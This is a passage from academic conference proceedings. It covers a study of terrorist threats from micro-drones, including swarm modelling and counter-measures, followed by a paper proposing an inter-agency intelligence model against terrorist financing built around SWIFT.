The higher the level of automation is, the more the human cost and risk is minimized from the point of
view of the attacker and the greater the probability of an unexpected attack increases (because fewer
staff are involved upstream and on field). The impact on the financial cost is more complex to measure,
because it is much more influenced by the material cost of the device (due to the payload and the
number of sensors) than by the embedded intelligence (software part). In what follows, we will apply the
previous scale to micro-UASs. Given the current technological breakthroughs available at a lower cost,
micro UASs represent new threats. Moreover, the multiplication of supply depots all over the world makes
it impossible to survey or to detect suspicious individuals or groups. If you look at what exists today on
the market for micro-UASs (less than 5 kg category) and given what we just described, we can
distinguish three cases:
Levels 1 and 2 which are relatively common, with reasonable prices. We find material for flying model
aircraft (

Isolated individuals
Laurent Beaudoinet al.
The most basic case is about the isolated individual (Beaudoin & Gademer, 2010). The UAS can be
piloted or autonomous and has a specific mission to perform. Small in size, easy to assemble, affordable
to fly, some models can even embed a light payload. They have all the assets to be used for terrorists
operations in the close future. However, if the pilot or the UAS is stopped, disabled or destroyed, the
threat is removed.
A group of individuals
A group of UASs is composed of several isolated individuals, each with their own mission without
coordination. Their sphere of action does not necessarily lie on the same location and each unit can be
considered as the case described in the previous paragraph. But by increasing the number of individuals,
we multiply the probability of a successful attack by trying to saturate the defense’s capabilities. The
main advantage of the group is that it does not need any collaboration among the individuals and thus
does not need advanced collaborative capacity.
Team of UASs
A team of UASs can be seen as a group in which all members are assigned specialized tasks and are
usually coordinated by a chief. Team formation is particularly effective: the objectives are divided and
each member can focus on achieving its task. With UASs on the third level (automatic navigation) of the
automation scale, you will have synchronized action but no possibility to update the mission plan
according to what happens on the field. The fourth level (without human intervention) will give you
reaction to the surroundings but may lead to a fatal loss of synchronization between the team members,
which quickly leads to using UASs of the fifth level. At this step, all members are communicating with
each other and the leader chooses what to do next. So the action is fast and has things in common with a
commando operation.
The missions that a team can perform could be far more complex than the one in the previous case.
The team strength is also its weakness: the more each member is highly specialized, the more the
destruction of a key element can jeopardize the whole mission (coordinator UAS, UAS with the lethal
load, UAS dedicated to the collection of information...). Survival of team-members is therefore critical and
fundamental to the proper performing of the mission.
The enemy can also try to predict the behaviour of a team, in a certain way, because it usually works
following a logical reasoning, and so it is possible for him to act accordingly.
Swarm of UASs
A swarm, unlike a team, is made of a uniform mass of undifferentiated individuals (Clough, 2002). The
robots forming a swarm are at least of the fourth level on the automation scale. The swarm has no “chief”
or “organization”. Its efficiency is based on the emergent behaviors related to the large number of
individuals and their interactions, that’s why they cannot be controlled and need to be automated. The
intelligence is decentralized (Frantz, 2005): each individual interacts with others on the same basis of
simple rules describing the reactions of individuals to their local environment (like a shoal of fish).
This decentralization, combined with the large number of individuals, allows the swarm to be a highly
resistant form (Chaumette et al., 2010). If some individuals disappear, it will have little influence on the
conduct of the mission. The resulting action is certainly less efficient, but the mission can still succeed.
Similarly, the swarm is resistant to local disturbances or to the addition of new individuals into the system,
the overall behaviour is the only one taken into account.
However, the behaviour of the swarm is only based on individuals' reactions. So it is not deterministic
(Lamont, 2007, 2008). Then, we can only estimate a probability of success, even in a favourable
situation, which is far removed from the optimum way of the team work. The main strength of a swarm, its
distributed intelligence and its lack of hierarchical bonds, is also its main weakness, which is its lack of
strategic global view.
26

Laurent Beaudoinet al.
Finally, the apparence of the swarm itself can fulfil another objective in psychological warfare. Indeed, it
can inspire both fear and powerlessness into the collective unconscious as for example in “The Birds” of
Hitchcock, or like the killer bees from South America, the ants in Indiana Jones, or grasshopper clouds.
3. The vulnerability of existing defense systems and counter measures
3.1 Vulnerability of present defense systems and attacks by micro-UASs
In practice, defense systems in simplified can be viewed as the achievement of two critical phases:
detection and identification of the danger and counteraction through appropriate response while
restricting collateral damage.
The traditional tools of detection used by air defence systems can be categorized into two families:
Active radar surveillance: they generate waves and use the rebound of the echoes on potential flying
objects to locate them. From there, it is possible to estimate their distance, their speed of approach,
the penetration vector, and even have an idea about their trajectory (at least in the short term) and
their size.
Monitoring by passive observation of the electromagnetic spectrum, either in the visible or thermal
infrared or by listening to the radio waves on the common communication channels.
In practice, the data fusion of multiple sensors allows to reduce noise and false alarms to the maximum
while maintaining reliability. Except unusual cases, the bigger the device is, the easier it is to notice.
Usually the defence systems are optimized to detect aircraft or missiles. They both move at a rather high
altitude and reach substantial speeds during the approach stage of the target.
The main problem posed by micro-UASs is that the approach stage can be practically non-existent,
because their small size allows them to be launched into action very close by the target (Carnu, 2010 ;
Miasnikov, 2005; Gademer, 2009, 2010, 2010a) . This cancels the long range defensive strategies and
raises the problem of reactivity from the decision line. Reactivity that has to be all the quicker as we are
near the target. Their slow flight at a very low altitude is an aggravating factor that increases the
probability of non-detection. Moreover, their electric motors do not leave a thermal signature, which
makes their detection extremely difficult.
Finally, the topography of the theatre of war can also be an additional factor of complexity, as in the case
of an urban environment. Here, the sphere of attack is limited. Therefore the interception stage inevitably
takes place near the target, so probably within the urban environment itself. Thus the risk of collateral
damage is much higher.
3.2 Counter-measures against these new threats
Once the danger is detected, it is then necessary to determine according to the context the best adapted
countermeasure. There are two big families of countermeasures (Mirkarimi et al., 2003, Haulman, 2003).
The first family, the active one, tries to incapacitate or to destroy the threat in a direct way (systems of airto-ground
defence for example). The second, the passive one, tries to protect from the danger in an
indirect way (physical protections around the target, the use of decoys, organized by systems of
communications or of jamming of the sensors of the aggressor as will be detailed in the practical case
part).
The first active countermeasures to fight against micro-UASs are inspired by classic anti-aircraft
defences. However, if the latter showed their ability on "classic" targets, their efficiency against smaller
and more reactive targets is much more mitigated, especially in urban zones with the public at risk. These
methods are also difficult to apply against enemies attacking simultaneously on multiple fronts, even if we
increase the ability of the defence system to react and make its saturation limit recede. The team mode of
operation should besides allow implementing operational strategies (decoys, shields, rams) which
complicates at the same time the stage of detection and interception. The swarm, on the other hand,
should be easier to detect globally because it is not evident to mask the arrival of a cloud of robot craft,
but it should show itself on the other hand much tougher to neutralize.
The passive countermeasures based on the physical protection of the target (installation of nets for
example) are last resort solutions. However, within the context of attack by micro-UAS, these solutions
can be effective because of the small size of the robots. The use of decoys supposes that we know a
27

Laurent Beaudoinet al.
priori the sensors used by the drone to make his kamikaze attack and how this information is used
particularly in the final phase. The jamming of communication would appear to be effective against
drones of level 1 or 2 which require the control of a pilot. It can also prove interesting to perturb the interdrones
communication required for a team or a swarm. The jamming of the sensors (false GPS
information, camera dazzling, magnetic disturbance of the heading sensor) can also be an effective
approach, whatever the level of automation.
4. Case study of a UAS swarm
4.1 Operational context
As we have seen previously, there can be a high operational interest to locally jam GPS cover. But a loss
of the signal can easily be detected by the attacker who can then activate a ploy like estimating the
course, the ground-speed and a timer in order to nonetheless reach the area of the target. More
interesting is the case in which we only slightly modify the GPS signal to give false positions to the
attackers in order to lure them into a chosen area. For the attacker, this strategy of defence is much more
difficult to detect. In every case, this strategy can be complicated to apply on an area with fixed facilities,
furthermore if the perimeter of the area to protect is mobile. A possible solution could be to use a swarm
of UAS, each of them having an action (eventually mobile) of locally jamming. In this hypothesis, we use
the swarm in a situation of defence. As for the aggressor, a solution could be to perform a kamikaze
attack in order to create a breach in the defence system in position. In our next section, we will show an
example an innovating demonstrator to test scenarios of swarm-based attack and defence in a given
operational context.
4.2 Operational modelling of a swarm in defense
To continue working, the swarm will have to respond to the suicide bomber attack. The maneuver that is
least costly in human resources will be a dodge to avoid contact with the bomber, but also with other
UASs of the swarm. However, in order to have an operational interest, we will have at the same time to
minimize the deformation of the network of the UAS swarm. Finally, to check the operational feasibility of
these solutions, we want to be able to perform the associated calculations locally and almost instantly,
which excludes conventional solutions such as those based on numerical modeling of virtual reality. To
accommodate the constraints, we propose to develop a demonstrator adapting a physical library
(Chipmunk) mainly used in video games on smart-phones. This pragmatic approach allows us to
leverage for our problem all the improvements and developments made by the video game industry for
which resource constraints and time calculations are close to what we want. The problem then is to find
how to model our problem in the range of tools available in the library. The modelling solution that we
propose for the demonstrator is:
Avoidance of UAS done through a repulsive force like the Coulomb one so as 1 / r ², where r is the
distance between the UASs.
Minimizing deformation of the mesh done by linking the UASs with their neighbours in eight
connexions by restoring forces in the manner of a spring where the coefficient of stiffness and length
at rest reflect the physical reality (UAS’s reactivity and inter-UAS distance respectively).
Figure 2 shows the physical network of the modelization. The big square is the attack UAS, and the small
ones the defend UAS. The images shows different position of the attack UAS and the re-organized
response of the defend UAS.
Figure 2: Modelization
28

Laurent Beaudoinet al.
Figure 3 shows screen shots of the demonstrator. This reacts in near real time. The modeling approach
shows the desired behavior (deformation of the mesh of the swarm optimized and UAS-UAS avoidance
made).
Figure 3: Demonstrator
From this demonstrator, we can draw two initial conclusions:
The real-time constraints can be totally satisfied on architectures with limited computing power, and
therefore be available in operation.
The modelling shows that it is virtually impossible for the attacker to destroy or disrupt the defender’s
swarm effectively, unless he develops abilities to move very much faster than those of the defenders.
4.3 Collaboration among UASs in attack
From the perspective of the attacker, since a single attack is not enough, we have explored different
scenarios of attacks of the defensive swarm by another offensive group using the demonstrator indicated
above.
Among the initial findings, it appears that an attack from a team of UASs that begins by encircling the
defensive swarm to limit the operating space increases dramatically the effectiveness of a direct attack,
but needs strong coordination to have a maximum effect.
We can reverse the demonstration and say that a UAS swarm in attack would be practically unstoppable
unless the defender demonstrates strong collaboration. If we describe a cloud of UAS as graph, we think
it will be possible to use graph matching techniques to distort an attacking swarm with amazing efficiency
over the defensive swarm.
We can conclude this part by saying that countering a swarm (in defence or attack) is very expensive
because it seems necessary to have high level collaboration on the defence group side. Costs are an
additional vulnerability factor for aerial security against a collaborative UAS attack.
5. Conclusion
We started this article by defining the new levels of automation and collaboration that the current UAS
technology can offer. We then presented how these new capacities could increase the potential menace
of a terrorist attack using simple short-range flying robots and why it seems necessary to start thinking
29

Laurent Beaudoinet al.
about appropriate responses to this particular problem. In the last part we have shown with a simplified
demonstrator that some basic rules could give a UAS swarm a strong endurance to kamikaze attack,
which can be used in a defensive way to maintain a local jamming on an area or in an offensive way to
overwhelm the enemy. Against collaborative UASs, it seems that the only solution would be smarter and
more numerous UASs. To conclude, our numerical approach has shown its value to estimate the
behaviour and interactions of an UAS swarm. Nevertheless these results should be consolidated by
practical tests; which will need to integrate the physical constraints of the robots and their sensors, as the
reacting time, the measurements errors including the positioning error, the processing and
synchronization capacities. Another way of extending this work could be 3D simulations, with remarkable
increase in complexity with both attack and defence strategies.
References
Abatti, J. M. and AL, A., “Small power: the role of micro and small UAVs in the future.”, Research report, Air
Command and Staff College, Air University, Maxwell Air Force Base, 2005.
Beaudoin, L. and Gademer, A., “Towards symmetrization of asymmetric air dominance : the potential key role playing
by home-made low cost Unmanned Aerial Systems”, in European Conferences on Information Warfare and
Security, ECIW’10, 2010.
F. Carnu, “The new face of air oriented terrorism and air defence systems vulnerabilities”, in Romanian Military
Thinking, p. 108-112, 2010.
Chaumette, S., Laplace, R., Mazel, C. and Godin, A., “Secure cooperative ad hoc applications within UAV fleets
position paper”, in Military Communications Conference, MILCOM 2009. IEEE, p. 1-7, 2009.
Chipmunk game Dynamics, http://code.google.com/p/chipmunk-physics/
Clough, B. T., “UAV swarming? So what are those swarms, what are the implications, and how do we handle them?”,
2002.
Christ, R. D., Wernli Sr, R. L., “The Rov Manual : a user guide for observation-class remotely operated vehicles”,
Butterwsorth-Heinemann, Chapter 2 : ROV Design, 2007
Frantz, N. R., “Swarm Intelligence for Autonomous UAV Control”, Thesis, Naval Postgraduate School, Dept. of
Electrical and Computer Engineering, 2005.
Gademer, A., Vittori, V. and Beaudoin, L., "From light to ultralight UAV", in International Conference Unmanned
Aircrafts System Forum, Eurosatory, 2010.
Gademer, A., “Réalité Terrain Étendue : une nouvelle approche pour l’extraction de paramètres de surface
biophysiques et géophysiques à l’échelle des individus”, PhD Thesis, ParisEst University, 2010a.
Gademer, A., Ché́ron, C., Monat, S., Mainfroy, F. and, Beaudoin,L., ”A low cost spying quadrotor for global security
applications using hacked digital cameras”, in DEFCON 17, 2009.
Haulman, D. L., “US unmanned aerial vehicles in combat, 1991-2003”, Research Paper, Air Force Historical
Research Agency Maxwell Air Force Base, 2003.
Lamont, G.B., “UAV Swarm Mission Planning Development Using Evolutionary Algorithms-Part I”, Research Paper,
NATO, SCI-195, 2007,
Lamont, G.B., “UAV Swarm Mission Planning Development Using Evolutionary Algorithms and Parallel Simulation-
Part II”, Research Paper, NATO, SCI-195, 2008.
Miasnikov, E., “Threat of Terrorism Using Unmanned Aerial Vehicles: Technical Aspects”, Technical Repport, Center
for Arms Control, Energy, and Environmental Studies, Moscow Institute of Physics and Technology, 2005.
Mirkarimi, D. B. and Pericak, C., “Countering the tactical UAV Threat”, Armor, vol. 112, n°. 1, p. 43, 2003.
Valenti, M., Bethke, B., How,J. P., de Farias, D. P. and Vian, J., “Embedding health management into mission
tasking for UAV teams”, in American Control Conference, 2007. ACC'07, p. 5777-5783, 2007.
Valenti, M., Dale, D., How, J. and Vian, J. , “Mission health management for 24/7 persistent surveillance operations”,
in AIAA Guidance, Navigation and Control Conference and Exhibit, 2007.
Singer, P. W., “Wired for War : the robotics revolution and conflict in the 21 st century”, Chapter 3 : Robotics for
dummies,The penguin press, New-York, 2009
30

Developing Intelligence in the Field of Financing Terror - an
Analytical Model of Anti-Terror Inter Agency and Cross
Border Cooperation: The Security of Financial Systems
Dimension
Alexander Bligh
Ariel University Center, Ariel, Israel
ab1061@columbia.edu
Abstract: This paper presents and analyzes the major challenges facing counter-terrorism players and proposes
some ways to counter the always-present intelligence deficits in the field of financing terrorism and the threat of
financing terrorism. However, this is in no way a recipe. The proposals introduced here are intended to raise
awareness and to suggest new approaches, and thus encourage fresh thinking on old issues, in the hope that this
will shed light on a narrow angle of the free world’s war on terror. This paper is based on the paper "Security through
Science", presented at the 2005 NATO sponsored “Advanced Research Workshop” at the University of Konstanz,
Germany, and later published (Bligh 2006). I have developed this model for a variety of uses, the issue of “dirty
money” among them. It attempts to map the needs and major obstacles, and to offer possible solutions based on the
integration of an analytical model with the most advanced technological hardware and software available to national
entities at the present time. The approach adopted here integrates an existing computerized platform, used by the
U.S. and NATO, with the SWIFT system, along with an original analytical model, proposed here, that can be used by
all system members. The system will operate along lines similar to current agreements governing the global and
national use of credit cards and ATMs. Nevertheless, it is worth noting that the conflict between privacy and security
is particularly acute here because the possession of financial assets is one of the most sensitive types of personal
data possible. The paper is divided to the following sections: the current map of terror and intelligence as related to
the financial dimension; the main challenges and a possible approach to a partial solution; and a proposed
methodology for developing intelligence.
Keywords: terrorism, security, intelligence, banking, money laundering
1. Introduction
Unlike weapons that can be paraded and that sometimes shoot, the transfer of funds is always veiled in
secrecy. State budgets, and certainly those of underground organizations, usually hold the secrets of
current and future strategy. In fact, they can tell volumes about the overt and covert sources of financing
that enable, or prevent, the carrying out of activities; they carry the secret life of every organization.
Moreover, handling weapons is probably a less sophisticated undertaking than the effective handling of
money. A money expert must make sure that it will bear fruit on the one hand, yet not attract the attention
of any law enforcement agency. The expertise necessary for the handling of funds leads to the
inescapable fact that only a handful of experts can handle the financing of terrorist organizations. Beyond
their financial routine, they must invest extra care lest they be accused of embezzling funds and forced to
face retribution. Clearly, since there is no need to present balance sheets to very many authorities, the
temptation to misuse funds is greater than in public bodies. Thus, collecting intelligence on the financial
matters of organized crime (O/C) and terrorist organizations may be hindered by several constraints:
The difficulty in infiltrating the small ring of experts who deal with terrorist or O/C money, as well as
the (even) smaller number of financial counter-terrorism experts capable of tracking these
organizations' budgets.
The typically legitimate fundraising of religious organizations and the natural concern of governments
about violating the religious freedoms of innocent citizens.
The tendency of intelligence officers to only take into consideration tangible materials rather than
examining organizations’ balance sheets.
Consequently, one of the major, yet understudied, dimensions of the analysis of terrorist activity, and the
ways to counter it, is the financial dimension. Like any other activity, legal or illegal, a terrorist has to put a
price tag on achieving his goals: from rewarding the lowliest field operative to the purchase of raw
materials for producing nuclear devices. Therefore, it is only logical to assume that every terrorist action
works within a budget, which is based on several sources of income and an itemized list of expenses.
Since many of these organizations operate outside the realm of their sponsoring countries, the financial
dimension also involves the issue of transferring funds while evading scrutiny.
31

Alexander Bligh
The following paper presents and analyzes the major challenges facing counter-terrorism players, and
proposes several ways to counter elements of this threat. However, this is in no way a recipe. The
proposals introduced here are intended to raise awareness and to suggest new approaches, and thus
encourage fresh thinking on old issues, in the hope that this will shed light on a narrow angle of the free
world’s war on terror.
This paper is based on the paper "Security through Science", presented at the 2005 NATO sponsored
“Advanced Research Workshop” at the University of Konstanz, Germany, and later published (Bligh
2006). I have developed this model for a variety of uses, the issue of “dirty money” among them. It
attempts to map the needs and major obstacles, and offers possible solutions based on the integration of
an analytical model with the most advanced technological hardware and software available to national
entities at the present time.
The approach adopted here integrates an existing computerized platform, used by the U.S. and NATO,
with the SWIFT system, along with an original analytical model, proposed here, that can be used by all
system members. The system will operate along lines similar to current agreements governing credit
cards and ATMs. Nevertheless, it is worth noting that the conflict between privacy and security is
particularly acute here because the possession of financial assets is one of the most sensitive types of
personal data possible (Ballard 2006).
The paper is divided to the following sections: the current map of terror and intelligence as related to the
financial dimension; the main challenges and a possible approach to a partial solution; and a proposed
methodology for developing intelligence.
2. The current map
Three major, and apparently unrelated, processes have occurred since the beginning of the 21 st century:
The dramatic development of never-before dreamed of computing capabilities, and consequently the
increased use of sophisticated communications systems at rapidly decreasing costs.
The wave of terror against major centres in the West and elsewhere (New York, Moscow, various
parts of Iraq, Madrid, London, Asia, the Indian sub-continent, the Sinai, various parts of Israel, etc.).
The closing of the ranks among a growing number of countries against this wave of terror.
The money transfer market is divided into two distinct branches: a formal, and thus traceable, branch,
which uses systems like SWIFT, and an informal one, using hawala type systems (Razavy 2005). The
formal field is usually used by innocent bodies (Bloodgood 2011), major firms, and numerous individuals.
These lawful channels are threatened with misuse by malicious parties. This level is operated by a
number of firms that adhere to pre-established rules and function in line with the anti-laundering laws of
the countries that take part in the system. Many large firms have been granted direct access to SWIFT
since 2009, while using one standardized security protocol (Global Finance 2011). At least one of the
firms on the formal tier stated that major money transfers originate in the U.S., Western Europe and the
Middle East (Fair Disclosure Wire 2007), and that the major recipients are located in the Asian Pacific
region, the Indian sub-continent, and Africa. It also reported a major increase in these transfers between
2002 and 2006. These characteristics clearly reflect the current global foreign labour map: mostly
Muslims from Turkey, Pakistan, the Philippines, Sri Lanka and various African countries who find their
way to France, Germany, the oil rich countries in the Gulf and, obviously, the USA. The Chinese factor is
not fully apparent yet but it will undoubtedly become much more significant in the years to come. For
many of these receiving countries, remittances originating in foreign countries are the major source of
foreign currency that keeps their economies functioning. The known money transfers in this market equal
to roughly 25-30% of the money transfers taking place in a given year. The total amount of transfers in
2005 was estimated at $269 billion (Fair Disclosure Wire 2007), which implies that the overall transfers of
that year amounted to around $1 trillion. About 70-75% of this enormous sum is unaccounted for, in
terms of its sources and/or intended recipients. In 2010-2011, more than one half of the remittances
entering Bangladesh arrived there using informal channels (Financial Express 2011), a fact that does not
necessarily imply that these funds were used for illegal purposes. An official U.S. publication, quoting
international financial institutions, estimated annual hawala transfers at approximately $2 trillion,
representing 2 percent of all international financial transactions (Olson 2007). These numbers seem out
of context, especially considering that they are supposedly updated only up to 1995!
32

Alexander Bligh
On the formal level, any discussion must make note of the Brussels-based Society for Worldwide
Interbank Financial Telecommunications (SWIFT) network, which transmits the instructions to execute
most of the transfers that take place through the Clearing House Interbank Payments System (CHIPS,
“...is the premier bank-owned payments system for clearing large value payments. CHIPS is a real-time,
final payments system for U.S. dollars that uses bi-lateral and multi-lateral netting for maximum liquidity
efficiency. CHIPS is the only large-value system in the world that has the capability of carrying extensive
remittance information for commercial payments"; http://www.chips.org/home.php) and a second U.S.based
network, Fedwire, (“The Fedwire funds transfer system is a large-dollar electronic payment system
owned and operated by the Federal Reserve Bank that transfers funds between financial institutions on
behalf of their customers. This service operates similarly to Automated Clearinghouse (ACH). However,
depository institutions typically transfer large dollar payments, such as a down payment for a home
purchase through Fedwire, and use the ACH for small-dollar payments. The majority of Fedwire
transactions are initiated on-line, and all transactions are completed in seconds";
http://www.federalreserveeducation.org/about-the-fed/structure-and-functions/financial-services), which
handles almost all U.S. domestic transfers (Shields 2005). In June 2007, Fedwire and CHIPS introduced
a new approach to wiring money domestically. The starting point for this change was their customers’
convenience and not necessarily the security dimension. Here, as in many other security related issues,
the main conflict is between basic individual civil rights and the right to security (Treasury & Risk 2007).
Clearly, a significant proportion of the funds used directly or indirectly for terror purposes are transmitted
through informal channels, though some unknown sums are also channelled through legitimate bank
transfers. Unfortunately, tracing illegal funds in the legitimate system, and certainly in the informal hawala
system, is not easy, especially when terrorist organizations are involved. Because the amounts involved
are not high enough to stand out of the entire body of transactions, it is hard to trace the paper trails of
terrorist organizations. U.S. law enforcement agencies suspect that much of al-Qaeda’s funding for 2001
(amounting to $30 million) was transferred through Middle Eastern hawala networks (Freedman 2005).
However, as it was broken into small instalments, it is doubtful whether any agency noticed it prior to
9/11. Moreover, according to the 9/11 Commission, the operating expenses for the 9/11 attacks were
between $400,000 and $500,000 (Casey 2007). It is difficult to isolate and identify funds financing
terrorism from among the enormous number of national and international transactions made daily.
Another problem in detecting money transfers for illegal purposes is that the money is often supposedly
raised for legitimate religious purposes, and can be labelled as "black" only when put to radical and
terrorist uses. This is almost a mirror image of the situation where money raised by organized crime from
illegal sources is later laundered. The interface between "white" money of radical organizations turning
"black" and "black" O/C money turning "white", is also the meeting point of terrorism and O/C.
3. The main challenges and a possible approach to a partial solution
Unlike other aspects of combating terrorism, when dealing with the financial dimension there is at least
one clear and measurable criterion: the amount of money seized from terrorist organizations and
personnel. According to this criterion, the rate of success here is rather low, as no significant amounts
have ever been reported to have been seized. In some areas, such as Southeast Asia, the effort on the
financial level has been assessed as a failure (Abuza 2003), despite other elements in the war on terror
being successful. Moreover, the distinction between formal systems and hawala-type systems divides the
war on financing terrorism and O/C into two different battlefields.
Recent terrorist activities in a score of liberal and liberalizing nation-states have once again highlighted
the need to share intelligence and to create a comprehensive framework to combat terrorism as one
means of improving the situation, particularly in the context of terror financing. This network needs to
overcome the same difficulties that private organizations, financial institutions, national agencies and
countries face when talking to each other about terrorism, as well as the almost impossible demand for
intelligence sharing among agencies, even in the same country. Despite of the varying conditions
between the nations facing terrorist threats, all are confronted by similar methodological stumbling blocks:
How can terror-related money transactions be verified, and an association with terrorist activities
established?
How can financial institutions cooperate in fighting terrorism? Can combating terrorism overcome
commercial competition?
Is money laundering, a typical O/C offense, becoming the basis for O/C cooperation with terrorist
organizations?
33

Alexander Bligh
Are differences in privacy and anti-terrorism laws rendering cross-border cooperation impossible?
Considering the diversity in foreign policies, as well as the varied nature of the terrorist threat in the
countries of the free world, is it at all possible to reach at least some basic understanding regarding
the goals and strategy of the war on terror?
Several elements have been put together since 9/11, and even before that watershed event, in partial
response to some of these issues. None has ever provided a full and comprehensive remedy since it is
impossible to achieve one. However, it worthwhile to note that the International Money Laundering
Abatement and Financial Anti-Terrorism Act of 2001, also known as the 2001 USA Patriot Act Title III,
does not recognize any difference between the illegal financial activities of O/C and terrorism, probably
due to the numerous criminal deals between these two types of organizations (Hudson 2010).
The issue of bank policies has been handled with the creation of the Financial Action Task Force on
Money Laundering (FATF, "The Financial Action Task Force on Money Laundering was established by
the G-7 Summit that was held in Paris in 1989 and has today 34 member states. The FATF is an intergovernmental
body whose purpose is the development and promotion of policies, both at national and
international levels, to combat money laundering and terrorist financing."; http://www.fatfgafi.org/pages/0,3417,en_32250379_32236836_1_1_1_1_1,00.html)
and by national legislation in many
countries. The FATF also provides a cross-border system capable of cooperation without compromising
state secrets and sensitive intelligence. However, the issue of small transactions evading the early
warning systems has not been resolved yet, and there is no solution in sight.
Perhaps, the issue of variation in foreign policies and the varied nature of the terrorist threat can be
resolved by defining some standardized intelligence goals and methods. Indeed, the war against terror
necessitates clear, detailed, and timely intelligence. All these were basic elements in NATO’s battlefield
digitization process, which was introduced in the late 1990s. However, in those pre-9/11 days, the
process was intended for a somewhat old-fashioned theatre of operations, very much like the Balkans,
for example. Today, data collection and dissemination are tools not only available to the armed forces.
Other likely consumers today are security services, police forces, and national central banks.
A growing number of countries have legislation and bodies to combat money laundering. However, they
need to overcome a number of obstacles:
First, no central national/regional/international early-warning system is integrated with any intelligence
service in an automated fashion, capable of flagging suspicious transactions and setting specific steps in
motion.
Second, even if national Financial Intelligence Units (FIUs) operate within a national intelligence system,
they may not be open and available to formal financial institutions. Obviously, informal systems are not
subject to any central regulating body, and constitute a commercial competition to the established banks
and a security threat to governments. Consequently, banking and national systems only address part of
the issue. Nevertheless, imposing a regulatory and supervisory system will make the transfer of funds
much more difficult for offenders, current or potential. Still, since no agreed upon early-warning system is
available to the banks, it is necessary for an international body to devise such an approach, which would
be uniformly used by all banks and be subject to central supervision. Applying this structure would be a
prerequisite for issuing new, and renewing old, licenses to banks. Employing this approach would not
compromise any trade secrets, but would enable constant dialogue between banks and law enforcement
agencies. It would also, to some extent, overcome the different rules under which various FIUs operate.
Third, the supervision of formal financial institutions does not include transactions under a certain
minimum (usually $10,000). Thus, no series of small transactions can be identified, if broken along bank
and/or country lines.
The following solution addresses the first two problems, but not the third. Whenever relevant money
transactions are involved, two main players should be considered: the regulators, i.e. the central
governments through their central banks, and the private financial institutions.
Central government and security services operate according to laws, regulations and external supervision
through reported and unreported channels. Currently, many countries follow, to a large extent, the
recommendations of the FATF, even if they are not full members. Central government regulations are
34

Alexander Bligh
clearly mandatory, and are always in agreement with privacy laws. However, they are never in agreement
with the view of the banks that the government is meddling in their business and invading the privacy of
their customers.
As an alternative to government action, banking institutions recommend setting up private intelligence
systems and in-house supervision. Establishing this security net will provide them with better control over
intelligence, while keeping trade secrets in-house. Banks also have their own intelligence, which the
central regulator does not possess, particularly visual intelligence gathered from surveillance cameras
and financial data and records in which at least one party is typically identified. Much as this information
is vital to the end product – the identification of illegal transactions – it tells only one part of the story. The
other part is supplied by the central regulator from lists of central clearing bodies.
The only way to maximize the effectiveness of the data is through digital comparison so that the image of
any person entering a bank would be automatically transmitted to a central image bank, kept nationally or
internationally (one option is to store it within the SWIFT database). If the image is not of a wanted
person, the image would be erased and not be retained in any central database. Based on national
privacy laws, it would also be possible to add any pertinent data to the database (account number, for
instance).
Before it is possible to adopt one mandatory system, the conflict of interest between the threatened
countries and the banks has to be bridged to some extent. A comprehensive solution is probably
impossible, since the conflict between the two players is inherent. It is clearly the interest of the banking
institutions to limit the number of suspected and reported transactions, because this might curb their
profits. As already mentioned, they also aspire to prevent the leaking of business data. However, they
usually prefer to operate in agreement with the country’s security and privacy requirements. These
factors should be considered when developing a new methodological approach.
4. A proposed methodology for developing intelligence
The approach proposed here endeavours to operate along three interwoven dimensions:
Dimension one:
Goal: Reconstruction. Identifying as many elements as possible of the terrorist infrastructure and its
operation, from the idea stage up to the execution stage (detonating a bomb, a hijacking, or a suicide
bombing that occurred in the past). Accountants should verify post factum terror-oriented transactions.
Characterization of personnel: This comparative study can be carried out by teams of academics,
accountants, and terrorism experts.
Methodology: Based on the accumulated experience of foiled terrorist attacks and unfortunate cases that
were studied post mortem. The team will also collect data from existing literature and will conduct field
research, including interviews with apprehended and convicted terrorists and with anti-terrorism and
money laundering experts. This body of evidence will be tabulated, compared, and analyzed, including all
early signs which were ignored in the past. This will produce a master matrix for a flow chart of a terrorist
event, including the money junctions: when, where, why and how money was used, and for what
purposes. The personnel responsible for the monetary dimension would be identified.
End product: The main outcome of this dimension will be a generic model of a terrorist attack, along with
its financing methods and early warning signs. Put together, this part may be viewed as the creation of a
manual for executing a terrorist action along with its financing, intended to serve all participants, from the
supreme leader almost down to the individual terrorist.
Dimension two:
Goal: Assigning responsibilities. The detailed model described above will be followed by a list of law
enforcement agencies, government bodies, and banking experts responsible for each operational stage,
including the gathering of information and foiling efforts.
35

Alexander Bligh
Characterization of personnel: Anti-terrorism experts, existing agencies from NATO countries, and
political science personnel specializing in public administration, together with legal and financial experts
who carefully follow the legality of each of the abovementioned efforts.
Methodology: Collecting data from existing literature and interviews with convicted terrorists and
members of governmental agencies in NATO and SWIFT member countries. All anti-terrorism bodies
together with their assigned and actual responsibilities will be listed, and their current contribution to the
effort assessed according to their compatibility with other agencies within NATO. This body of evidence
will be compared and combined with the model in DIMENSION ONE.
End product: A model for the division of responsibilities, reflecting the current needs of the anti-terrorism
and financial agencies, and a model of information-gathering including targets, methods, sources, as well
as a dynamic list of information priorities.
Dimension three:
Goal: Providing the legal infrastructure for the anti-terrorism effort and its financial dimension.
Characterization of personnel: Joint teams of legal, banking and anti-terrorism experts will collect all
pertinent pieces of legislation, laws and regulations from NATO members and SWIFT countries.
Methodology: The efforts, described in dimensions one and two, need to be accompanied by legislation
relating to civil and human rights in the countries involved. This will provide the legal basis for any action
taken, from data collection to the seizure of people and material.
End product: A legal manual for all anti-terrorism elements, detailing the legal environment in which they
operate. The manual will elaborate on the steps that can be taken, country-by-country, and the instances
in which legal advice is necessary.
Together, these three dimensions will produce a financial anti-terrorism toolbox consisting of:
A terror manual.
An information-gathering model (including: responsible bodies, a generic list of essential information,
terminology)
A legal handbook including the breakdown of the legal basis for operations country-by-country.
5. Conclusion
The approach proposed above envisions the establishment, by SWIFT and/or a consortium of other
financial institutions, of a 24/7 central clearing house of suspected and pertinent financial data to be
combined with non-financial data, supplied by other bodies. The creation of such a body would not
resolve the issue of financing terror. However, it would significantly enhance the likelihood that a common
language of experts would be found, and some contribution could be made towards fighting the financing
of terrorism and O/C. Viewing this method as another layer in countering terrorism may also increase
international and inter-agency dialogue and exchange of information without the lingering misgivings that
this might compromise national assets.
Acknowledgments
Prof. Bligh of the Ariel University Center, Israel, wishes to thank the Shcusterman family fund and the
University of Notre Dame for allowing him the time and resources to carry out this study.
References
Abuza, Z. (2003) “Funding Terrorism in Southeast Asia: The Financial Network of Al Qaeda and Jemaah Islamiya”,
Contemporary Southeast Asia: A Journal of International & Strategic Affairs, vol. 25, August, pp. 169-199.
